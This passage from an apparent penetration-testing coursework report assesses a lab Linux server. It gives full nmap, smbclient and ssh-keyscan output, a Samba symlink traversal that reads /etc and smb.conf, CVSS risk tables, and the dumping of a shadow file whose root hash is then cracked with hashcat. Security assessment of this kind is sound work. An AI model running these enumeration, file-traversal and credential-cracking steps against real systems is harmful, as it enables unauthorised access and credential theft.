OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
root@kali:~#
```

Figure 29: Result of `nmap -O` command

Following the same procedure as before, foundational knowledge of open ports is obtained using **nmap**, showing ports 22, 111, 139 and 445 belonging to the **ssh**, **rpcbind**, **netbios-ssn** and **microsoft-ds** services, respectively.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -T4 -n --open 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:32 EDT
Nmap scan report for 192.168.9.128
Host is up (0.000024s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 00:50:56:BE:78:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
root@kali:~# nmap -sS -p- -T4 -n --open 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:32 EDT
Nmap scan report for 192.168.9.128
Host is up (0.000025s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
38235/tcp open  unknown
MAC Address: 00:50:56:BE:78:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
root@kali:~#

```

Figure 30: Open ports on server 7

This can be again be further prised with **nmap -sS -sV**, indicating the full services and versions as OpenSSH 6.0p1 and Samba 3.X-4.X. OpenSSH 6.0p1 Debian 4+deb7u3 infers that the system is Linux Debian 7-based.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sS -sV --version-light -reason -p 22,111,139,445,38235 -T4 -n 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:38 EDT
Nmap scan report for 192.168.9.128
Host is up, received arp-response (0.00046s latency).

PORT      STATE SERVICE      REASON          VERSION
22/tcp    open  ssh          syn-ack ttl 64  OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
111/tcp   open  rpcbind      syn-ack ttl 64
139/tcp   open  netbios-ssn syn-ack ttl 64  Samba smb3 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 64  Samba smb3 3.X - 4.X (workgroup: WORKGROUP)
38235/tcp open  unknown     syn-ack ttl 64
MAC Address: 00:50:56:BE:78:2D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.52 seconds
root@kali:~# nmap -sS -sV -reason -p 22,111,139,445,38235 -T4 -n 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:38 EDT
Nmap scan report for 192.168.9.128
Host is up, received arp-response (0.00040s latency).

PORT      STATE SERVICE      REASON          VERSION
22/tcp    open  ssh          syn-ack ttl 64  OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
111/tcp   open  rpcbind      syn-ack ttl 64  2-4 (RPC #100000)
139/tcp   open  netbios-ssn syn-ack ttl 64  Samba smb3 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 64  Samba smb3 3.X - 4.X (workgroup: WORKGROUP)
38235/tcp open  status      syn-ack ttl 64  1 (RPC #100024)
MAC Address: 00:50:56:BE:78:2D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
root@kali:~#

```

Figure 31: Version information for open ports on server 7

The OpenSSH version can be reaffirmed using a banner grab on port 22, identifying it again as 6.0p1. By doing this, nmap's scan result is validated as being accurate.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -sS -p 22,111,139,445,38235 --script=banner -n -T4 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:47 EDT
Nmap scan report for 192.168.9.128
Host is up (0.00048s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
111/tcp    open  rpcbind
139/tcp    open  netbios-ssn
445/tcp    open  microsoft-ds
38235/tcp  open  unknown
MAC Address: 00:50:56:BE:78:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds
root@kali:~# nc 192.168.9.128 22 -w 3
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3

Protocol mismatch.
root@kali:~#
```

Figure 32: SSH banner grab on server 7

The Remote Procedure Call (RPC) service can again be queried, as it was for server 2. By running the **rpcinfo** command, the port mappings are shown, allowing for services to be identified beyond the main exposed ports. It shows that port 111 is assigned to the **portmapper** service, with port 38235 belonging to the **status** service. The results of this command are shown in the figure below.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# rpcinfo -p 192.168.9.128
program vers proto  port  service
100000   4      tcp    111   portmapper
100000   3      tcp    111   portmapper
100000   2      tcp    111   portmapper
100000   4      udp    111   portmapper
100000   3      udp    111   portmapper
100000   2      udp    111   portmapper
100024   1      udp    53701 status
100024   1      tcp    38235 status
root@kali:~#
```

Figure 33: RPC service mapping for server 7

The next operation was an **nmap** vulnerability scan, which was run in order to automatically identify CVEs applying to certain services. The scan results show the regsvc service as being vulnerable to Denial of Service attacks.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap --script=vuln -p 22,111,139,445,38235 -n 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-17 11:54 EDT
Nmap scan report for 192.168.9.128
Host is up (0.00020s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
38235/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:50:56:BE:78:2D (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos:
|_VULNERABLE:
|_Service regsvc in Microsoft Windows systems vulnerable to denial of service
|_State: VULNERABLE
|_The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null dereference
|_pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|_while working on smb-enum-sessions.

Nmap done: 1 IP address (1 host up) scanned in 38.53 seconds
root@kali:~#

```

Figure 34: nmap vulnerability scan on server 7

The Samba service can be probed further to reveal further information about its structure and capabilities. Firstly, three Samba-specific **nmap** scripts can be run to identify certain properties of the service, including version (3.6.6) and some configuration information. Samba 3.6.6 reached EOL in August 2015, so is now considerably out of date (Samba Team, 2015). Indicated in this scan is the use of the deprecated, insecure SMBv1 protocol only, as well as SMB message signing being disabled.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -p445 --script smb-os-discovery,smb-protocols,smb-security-mode 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-11-25 06:21 EST
Nmap scan report for 192.168.9.128
Host is up (0.00057s latency).

PORT      STATE SERVICE
445/tcp   open  microsoft-ds
MAC Address: 00:50:56:BE:78:2D (VMware)

Host script results:
|_smb-os-discovery:
|_OS: Unix (Samba 3.6.6)
|_Computer name: localhost
|_NetBIOS computer name:
|_Domain name:
|_FQDN: localhost
|_System time: 2025-11-25T03:20:53-08:00
|_smb-protocols:
|_dialects:
|_NT LM 0.12 (SMBv1) [dangerous, but default]
|_smb-security-mode:
|_account_used: guest
|_authentication_level: user
|_challenge_response: supported
|_message_signing: disabled (dangerous, but default)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
root@kali:~#

```

Figure 35: Result of nmap Samba scripts

The Samba shares themselves can be enumerated by connecting with the `smbclient -L` command, which displays the available shares as `IPC$`, `print$` and `public`, with the final share being of particular note.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# smbclient -L //192.168.9.128 -N --option="client min protocol=NT1"

      Sharename      Type      Comment
      -----      -
IPC$          IPC       IPC Service (localhost server)
public        Disk      Public Share
print$        Disk      Printer Drivers
Reconnecting with SMB1 for workgroup listing.

      Server          Comment
      -----      -
Workgroup      Master
WORKGROUP     LOCALHOST
root@kali:~# █

```

Figure 36: Enumeration of Samba shares on server 7

With knowledge of the public share, this can be connected to anonymously and commands executed against it. As is shown below, files can be written to the accessed public share at will.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "ls"
.          D          0      Thu Sep 23 08:09:17 2021
..         D          0      Sun Sep  5 06:54:14 2021
restricted N          23     Sun Sep  5 06:54:14 2021

19513212 blocks of size 1024. 17316772 blocks available
root@kali:~#
root@kali:~# echo "test" > test_upload.txt
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "put test_upload.txt"
putting file test_upload.txt as \test_upload.txt (4.9 kb/s) (average 4.9 kb/s)
root@kali:~#
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "ls"
.          D          0      Tue Nov 25 06:24:24 2025
..         D          0      Sun Sep  5 06:54:14 2021
test_upload.txt A         5      Tue Nov 25 06:24:25 2025
restricted  N          23     Sun Sep  5 06:54:14 2021

19513212 blocks of size 1024. 17316768 blocks available
root@kali:~# █

```

Figure 37: Public Samba share being connected and uploaded to

Other parts of the filesystem can be enumerated and traversed using symlinks. Seen below, a symlink can be set up for certain directories on the Samba filesystem and their contents examined.

```

root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "symlink /etc/ etc_link"
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "cd etc_link; ls"
.                D           0 Tue Nov 25 06:34:29 2025
..               D           0 Sun Sep  5 06:54:14 2021
security         D           0 Tue Mar  8 12:08:36 2016
rsyslog.d        D           0 Tue Oct  7 17:54:23 2014
timezone         N           11 Tue Mar  8 12:09:07 2016
staff-group-for-usr-local N       771 Sat Jun  9 06:00:00 2012
resolv.conf      N           61 Tue Nov 25 06:34:29 2025
logrotate.d     D           0 Sun Sep  5 06:54:09 2021
adduser.conf     N       2981 Tue Mar  8 12:08:54 2016
cron.daily       D           0 Sun Sep  5 06:54:09 2021
bash.bashrc     N       1895 Thu Sep 25 16:46:23 2014
terminfo         D           0 Tue Mar  8 12:08:28 2016
initramfs-tools D           0 Tue Mar  8 12:09:12 2016
vim              D           0 Fri Apr 19 19:37:43 2019
hosts.deny       N       880 Tue Mar  8 12:12:52 2016
mailname         N           10 Tue Mar  8 12:13:05 2016
nsswitch.conf    N           475 Mon Aug 28 12:33:19 2006
mailcap.order    N       449 Sun Dec 21 03:45:18 2014
udev             D           0 Tue Mar  8 12:08:56 2016
mke2fs.conf      N       956 Wed Mar 20 21:18:44 2013
sgml             D           0 Tue Mar  8 12:13:36 2016
ld.so.conf       N           34 Tue Mar  8 12:08:02 2016
gshadow          N       502 Sun Sep  5 06:54:10 2021
locale.gen       N       8588 Tue Mar  8 12:09:06 2016
deluser.conf     N           604 Tue May 15 16:48:41 2012
console-setup    D           0 Tue Mar  8 12:10:05 2016
kernel          D           0 Tue Mar  8 12:09:11 2016
hosts.allow      N           580 Tue Mar  8 12:12:52 2016
protocols        N       2933 Sun May 13 19:11:19 2012
idmapd.conf      N           214 Sat May 11 08:38:17 2013
rc2.d            D           0 Sun Sep  5 06:54:10 2021
shells           N           73 Tue Mar  8 12:08:35 2016
rc1.d            D           0 Sun Sep  5 06:54:09 2021
dbus-1           D           0 Sun Sep  5 06:54:10 2021
issue.net        N           19 Sun Jan  4 22:21:07 2015
dhcp3            D           0 Sun Sep  5 06:54:02 2021
rc3.d            D           0 Sun Sep  5 06:54:10 2021
ppp              D           0 Tue Mar  8 12:12:07 2016
cron.d           D           0 Tue Mar  8 12:08:55 2016

```

Figure 38: Establishing a manual symlink and viewing the contents of server 7's /etc/ directory

Additionally, once a symlink is established with a directory, certain files can be downloaded and opened.

```

blkid.tab        N           397 Tue Mar  8 14:06:09 2016
cron.weekly      D           0 Tue Mar  8 12:08:57 2016
Mutttrc          N       4565 Sat Nov 29 13:33:20 2014
ld.so.conf.d     D           0 Tue Mar  8 12:14:26 2016
sudoers          R           411 Tue Mar  8 14:06:17 2016
acpi             D           0 Tue Mar  8 12:09:57 2016
at.deny          N           144 Fri Oct  3 11:25:39 2014
kbd              D           0 Tue Mar  8 12:10:04 2016
sysctl.conf      N       2082 Sun May 20 02:08:37 2012
rmt              A           268 Wed Jan  2 11:17:22 2013
profile          N           851 Fri Jul 29 13:03:27 2011

19513212 blocks of size 1024. 17316752 blocks available
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "cd etc_link; get hosts"
getting file \etc_link\hosts of size 202 as hosts (2020000.0 KiloBytes/sec) (average inr KiloBytes/sec)
root@kali:~# cat hosts
127.0.0.1        localhost
127.0.1.1        localhost.vml  localhost

# The following lines are desirable for IPv6 capable hosts
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# █

```

Figure 39: Downloading a file from the /etc/ directory of server 7 using the manually established symlink

This can also be used to obtain the Samba configuration file, allowing confirmation of the parameters responsible for symlink traversal. Shown below, the presence of **wide links = yes** and **follow symlinks = yes** is what enables the behaviour shown in Figure 38.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# smbclient //192.168.9.128/public -N --option="client min protocol=NT1" -c "symlink /etc/samba/smb.conf samba_c
onfig; get samba_config"
getting file \samba_config of size 13041 as samba_config (130410000.0 KiloBytes/sec) (average inf KiloBytes/sec)
root@kali:~# cat samba_config
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
# A well-established practice is to name the original file
# "smb.conf.master" and create the "real" config file with
# testparm -s smb.conf.master >smb.conf
# This minimizes the size of the really used smb.conf file
# which, according to the Samba Team, impacts performance
# However, use this with caution if your smb.conf file contains nested
# "include" statements. See Debian bug #483187 for a case
# where using a master file is not a good idea.
#
#
# ===== Global Settings =====
[global]
allow insecure wide links = yes
## Browsing/Identification ###
```

Figure 40: Contents of server 7's Samba configuration file - part 1

```
#
# Share definition
#
[public]
comment = Public Share
# Path to directory
path = /files
# Allow writing to share
read only = no
# Force connections as guests
guest ok = yes
locking = no
# Sets the umask for files/directories created on this share
force create mode = 777
force directory mode = 777
# wide links for symlink traversal ( enabled by default in versions ≤ 3.4.5 )
wide links = yes
follow symlinks = yes
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# █
```

Figure 41: Contents of server 7's Samba configuration file - part 2

The cryptographic strength can be investigated to search for any insecure algorithms being used. Seen below, the SSH server is configured to support many insecure and deprecated cryptographic algorithms for encryption, host keys and key exchange.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# nmap -p22 --script ssh2-enum-algos 192.168.9.128
Starting Nmap 7.80 ( https://nmap.org ) at 2025-11-25 06:31 EST
Nmap scan report for 192.168.9.128
Host is up (0.00060s latency).

PORT      STATE SERVICE
22/tcp    open  ssh

ssh2-enum-algos:
kex_algorithms: (7)
  ecdh-sha2-nistp256
  ecdh-sha2-nistp384
  ecdh-sha2-nistp521
  diffie-hellman-group-exchange-sha256
  diffie-hellman-group-exchange-sha1
  diffie-hellman-group14-sha1
  diffie-hellman-group1-sha1
server_host_key_algorithms: (3)
  ssh-rsa
  ssh-dss
  ecdsa-sha2-nistp256
encryption_algorithms: (13)
  aes128-ctr
  aes192-ctr
  aes256-ctr
  arcfour256
  arcfour128
  aes128-cbc
  3des-cbc
  blowfish-cbc
  cast128-cbc
  aes192-cbc
  aes256-cbc
  arcfour
  rijndael-cbc@lysator.liu.se
mac_algorithms: (11)
```

Figure 42: Result of nmap ssh2-enum-algos script and examination of server 7's cryptographic algorithms - part 1

```
  hmac-sha2-512-96
  hmac-ripemd160
  hmac-ripemd160@openssh.com
  hmac-sha1-96
  hmac-md5-96
compression_algorithms: (2)
  none
  zlib@openssh.com
MAC Address: 00:50:56:BE:78:2D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~#
```

Figure 43: Result of nmap ssh2-enum-algos script and examination of server 7's cryptographic algorithms - part 2

To verify if key disclosure occurs, the **ssh-keyscan** command can be used. Shown below, the SSH service can be seen to disclose its host keys without proper authentication, increasing exposure.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# ssh-keyscan -p 22 192.168.9.128
# 192.168.9.128:22 SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
# 192.168.9.128:22 SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
192.168.9.128 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAQCNKuqiuahNgYncysEHcx2l8xB8Ve0+Gz5j7pDurV72tZSTk4z4+1/tfGKiCw1Ln+/Cd/54
Ri2uYs4X0mK3wt9Q7gdXmrxmlyroH40RyUgGgrg7UuHZ/LTWQ8xMT6Gb19A17FR7W+BxqnTbX4RVCKIsRGXuIZgh069pezDnH1V5Svuk0sQmBYHpZ4hcDn4ayEZ
1mRA9xcD92DlCgDDtQlwUjjFg/Gjz23r/U7B243DioQsXMsSeZ9PqhliVqAZYs0/U8I28o6K/2EpMlnn24fik89MRr5iyR/K6GHM2Q/QnH32ZLPGF3vS9oUugv5
t0lWp+kYvNc50JTOrLWHPsMo5
# 192.168.9.128:22 SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
192.168.9.128 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBB0j2hay0npVoPMh5SwGiGh85p5aE0fG+RoUcc
wquFivm7TR6ywjh0otcao91oegMJRbBu53gB3uIQvr70r69o/Q=
root@kali:~# █
```

Figure 44: Result of ssh-keyscan command and unauthenticated disclosure of server 7's host SSH keys

7.1.1 Summary of Findings

A summary of all evidence gained at this stage can be collated into the table below:

Information Type	Details
Network	
IP Address	192.168.9.128
MAC Address	00:50:56:BE:78:2D
Operating System	
Type	Linux
Distribution	Debian 7
Kernel	3.2-3.16
Architecture	32-bit
Services & Ports	
SSH (22)	OpenSSH 6.0p1 Debian 4+deb7u3 (Protocol 2.0)
RPC (111)	rpcbind service
NetBIOS-SSN (139)	Samba SMB service (NetBIOS)
Microsoft-DS (445)	Samba SMB service (direct hosting)
Service Versions	
SSH Version	OpenSSH 6.0p1
Samba Version	Samba 3.6.6
SMB Protocol Support	SMBv1 only
Samba Shares	
Available Shares	IPC\$, print\$, public
Anonymous Access	Public share accessible without credentials
Directory Listing	Files and directories visible via smbclient
Symlink Behaviour	Symlinks permitted (filesystem traversal possible)
Samba Configuration	follow symlinks = yes, wide links = yes
SSH	
Supported Algorithms	Multiple key exchange and encryption algorithms
Host Keys	Host RSA and other keys visible using ssh-keyscan
Technologies	
Remote Access	OpenSSH 6.0p1
File Sharing	Samba 3.6.6 (SMBv1)
RPC Framework	rpcbind

Table 5: Server 7 – Summary of Reconnaissance Findings

7.1.2 Vulnerabilities Summary

A summary of the vulnerabilities found in this section is displayed below:

Vulnerability	Service / Port	Discovery Method	CVE(s)	Potential Impact
Outdated/EOL Version (3.6.6)	Samba Samba – Ports 139, 445	nmap, smb-enum, smb-os-discovery	CVE-2012-1182, CVE-2015-0240, CVE-2017-7494	Remote Code Execution (RCE), privilege escalation
SMBv1 Enabled + SMB Signing Disabled	Samba – Ports 139, 445	nmap, smb-security-mode script	N/A	Man-in-the-middle (MITM) attacks, interception of credentials
Anonymous Read/Write Samba Share	Samba Public Share – Ports 139, 445	smbclient, manual browsing	N/A	Unauthorised read/write access, data disclosure
Samba Symlink Traversal (wide links and follow symlinks)	Samba – Ports 139, 445	smbclient, manual testing	CVE-2017-7494	File access outside of intended share
RPC regsvc DoS Vulnerability	RPC – Port 111	nmap –script vuln	CVE-2006-4694	Denial of Service attacks
Outdated OpenSSH Version (6.0p1)	SSH – Port 22	nmap -sV	CVE-2016-0777, CVE-2016-0778	Weak cryptography, information disclosure
Weak SSH Cryptographic Algorithms Supported	SSH – Port 22	nmap ssh2-enum-algos	CVE-2016-2183	Session decryption, weak confidentiality
SSH Host Key Enumeration	SSH – Port 22	ssh-keyscan	N/A	Host fingerprint enumeration, reconnaissance
Credential Reuse	SSH – Port 22	During exploitation; password hash cracked with hashcat	N/A	Lateral movement, full root compromise

Table 6: Summary of Identified Vulnerabilities on Server 7

Overall, Server 7 is shown to have a wide attack surface, evidenced by misconfigurations with the Samba service, outdated software packages, and insecure cryptographic algorithm support. Vulnerabilities like symlink traversal and use of the SMBv1 protocol provide several routes to disclosing sensitive data and overall system compromise.

7.2 Relevance of security issues found

The same scoring criteria can be applied to Server 7 as it was for Server 2. The vulnerabilities below are ranked by CVSS score, from highest to lowest.

Table 7: Vulnerabilities

Vulnerability	CVSS	Risk	Rationale
Credential Reuse	9.8	Critical	Reuse of identical credentials for the root accounts on Server 2 and 7 allowed for unrestricted lateral movement between systems. No additional privileges, user interaction or other conditions were required, resulting in an almost maximum CVSS score. The outcome of this systemic weakness being exploited is full violation of confidentiality, integrity and availability, representing the most severe impact on Ruskin Investment Bank's operations. Total compromise of the server would likely result in halting of business function altogether.
Samba Symlink Traversal (wide links / follow symlinks)	9.8	Critical	The second most severe vulnerability on Server 7 is the Samba misconfiguration allowing for viewing and modification of sensitive system files. With this being possible remotely and without authentication, the resulting CVSS score is very high. The result of this being exploited is compromise of both confidentiality and integrity, allowing for credential theft and privilege escalation. Possible exploitation scenarios include offline password cracking of retrieved files, or modifications being directly made to system configuration files.
Anonymous Read/Write Samba Share	9.1	Critical	Full, unauthenticated read/write access has been demonstrated, which severely impacts confidentiality and integrity. The impact of which could result in attackers uploading malicious files, or modifying critical data. The resulting CVSS score is slightly lower than the previous vulnerability as full traversal and RCE capabilities usually rely on chaining other attacks, but the direct threat of anonymous access is still very apparent. The risks to the business include sensitive data being leaked, or business disruption occurring due to critical data being tampered with.

Continued on next page

Table 7 (continued)

Vulnerability	CVSS	Risk	Rationale
Outdated / EOL Samba Version (3.6.6)	9.1	Critical	Samba 3.6.6 has been EOL since March 2016, and in the present day is at risk of numerous RCE CVEs. This allows for potential remote and unauthenticated exploitation, which is what is responsible for its CVSS score. Exploitation of this vulnerability occurs through code injection, which positions the attacker to enact further exploits that may result in compromise of system integrity. In the context of the business, sensitive financial data could be disclosed, or attackers could gain full access to administrative systems.
SMBv1 Enabled + SMB Signing Disabled	8.4	High	The SMBv1 protocol has been superseded by more secure versions, and today, is deemed cryptographically broken. Threats against SMBv1 include the EternalBlue family of attacks, including ransomware like WannaCry and its variants. As a result, exploits against this vulnerability are simple and prevalent, risking severe impact against confidentiality and integrity. The CVSS score is slightly lowered due to greater authentication requirements, with the attacker needing to be in a MITM position in order to perform an attack. The outcome of which could result in exposed user credentials, which may then lead to lateral movement within the system.
Weak SSH Cryptographic Algorithms	7.0	High	Support of outdated ciphers has the effect of weakening the confidentiality of SSH sessions, allowing for attackers to perform various cryptographic downgrade attacks. This itself does not directly result in system compromise, lowering the CVSS score relative to the RCE vulnerabilities. However, this could contribute to credential exposure or accessing of sensitive data under certain conditions, greatly undermining the confidentiality of Ruskin Investment Bank's remote administration capabilities.
Outdated OpenSSH Version (6.0p1)	6.8	Medium	As in Server 2's case, OpenSSH 6.0p1 has been EOL for over 7 years. The resulting risks are therefore the same, with remote administration being severely undermined. A possible attack path could be for hackers to exploit information leaking CVEs to weaken confidentiality. Operational risk using SSH is therefore very high, potentially resulting in exposed confidential financial data.

Continued on next page

Table 7 (continued)

Vulnerability	CVSS	Risk	Rationale
RPC regsvc Denial of Service	6.0	Medium	Discovery of the RPC DoS vulnerability carries a medium risk and its CVSS score reflects this. The complexity of such an attack is low, not having any credential requirement, but only threatens availability. An attacker could repeatedly trigger an exploit against the service to cause the it to go offline. The result of which could result in degradation of business function, but does not directly expose sensitive data or allow for code execution. In a financial environment, loss of availability could disrupt customer facing operations, which could result in reputational damage.
SSH Host Key Enumeration	3.1	Low	The potential to enumerate SSH host keys only carries minimal impact towards confidentiality, allowing for an attacker to fingerprint the server. An attacker could use host key enumeration, which could lead to eventual MITM or spoofing, but this does not threaten the business unless it is combined with other vulnerabilities or weaknesses. As a result, the overall CVSS score reflects the low direct severity of this vulnerability, but the reconnaissance it enables could support improved targeted attacks against the bank's infrastructure.

Table 7: CVSS-Based Risk Assessment of Identified Vulnerabilities on Server 7 – Ordered By Risk (desc.)

The ranking above, similarly to Server 2's table, reflects that remote vulnerabilities requiring no authentication pose the highest risk. The medium and low severity vulnerabilities include those that have limited impact on their own, but can support other attacks when chained together or used for reconnaissance purposes.

7.3 The exploitation of vulnerabilities found & backdoors potentially used

The attack plan for Server 7 was based around targeting its authentication system. Testing previously compromised passwords is an established penetration testing technique (MITRE Corporation, 2024), so this was a viable path to move laterally from the established root access on Server 2. The method is relatively low complexity and has high chances at success, especially in environments like this with weak authentication controls.

Using the previously exploited Server 2 and the newly created root user 'firefart', the shadow file can be examined. Below, the hashed password for the 'root' user can be seen and extracted.

```
firefart@localhost:/tmp#
firefart@localhost:/tmp# cd /etc
cd /etc
firefart@localhost:/etc# cat shadow
cat shadow
root:$6$Ywz7iATH$6o7zj4mmNsZvAu5tdqLCBNRw6w93sXWLNlwxI2d.xyg/HwjaGYvfbaYE8GSPpfscieZDwOdAoiJKxx.I7Kh/:16868:0:99999:7:::
daemon:*:16868:0:99999:7:::
bin:*:16868:0:99999:7:::
sys:*:16868:0:99999:7:::
sync:*:16868:0:99999:7:::
games:*:16868:0:99999:7:::
man:*:16868:0:99999:7:::
lp:*:16868:0:99999:7:::
mail:*:16868:0:99999:7:::
news:*:16868:0:99999:7:::
uucp:*:16868:0:99999:7:::
proxy:*:16868:0:99999:7:::
www-data:*:16868:0:99999:7:::
backup:*:16868:0:99999:7:::
list:*:16868:0:99999:7:::
irc:*:16868:0:99999:7:::
gnats:*:16868:0:99999:7:::
nobody:*:16868:0:99999:7:::
libuid!:16868:0:99999:7:::
Debian-exim!:16868:0:99999:7:::
statd:*:16868:0:99999:7:::
ntp:*:16868:0:99999:7:::
sshd:*:16868:0:99999:7:::
vboxadd!:16868:::
vagrant!:16868:0:99999:7:::
mysql!:17817:0:99999:7:::
firefart@localhost:/etc#
firefart@localhost:/etc# echo SID: 2304874
echo SID: 2304874
SID: 2304874
firefart@localhost:/etc#
```

Figure 45: Contents of server 2's shadow file containing the root user's password hash

Then, using **hashcat**, the extracted password hash can be cracked using an extensive wordlist. This reveals the password for the root account of Server 2 as **puppet**.

```
root@kali:~# echo SID: 2304874
SID: 2304874
root@kali:~# cat hash.txt
$6$Ywz7iATH$6o7zj4mmNsZvAu5tdqLCBNRw6w93sXWLNlwxI2d.xyg/HwjaGYvfbaYE8GSPpfscieZDwOdAoiJKxx.I7Kh/
root@kali:~# hashcat -m 1800 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting ...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
You can use --force to override, but do not report related errors.
OpenCL Platform #1: Intel(R) Corporation
=====
* Device #1: Intel(R) Xeon(R) Gold 6130 CPU @ 2.10GHz, 494/1977 MB allocatable, 4MCU

OpenCL Platform #2: The pocl project
=====
* Device #2: pthread-Intel(R) Xeon(R) Gold 6130 CPU @ 2.10GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=8 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=2 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D unroll'
* Device #1: Kernel m01800-pure.b7de0be9.kernel not found in cache! Building may take a while ...
Compilation started
Compilation done
```

Figure 46: Cracking of server 2's root user's password hash using hashcat - part 1

```

Kernel <m01800_init> was not vectorized
Kernel <m01800_loop> was not vectorized
Kernel <m01800_comp> was not vectorized
Done.
* Device #1: Kernel amp_a0.a71ba548.kernel not found in cache! Building may take a while...
Compilation started
Compilation done
Linking started
Linking done
Device build started
Device build done
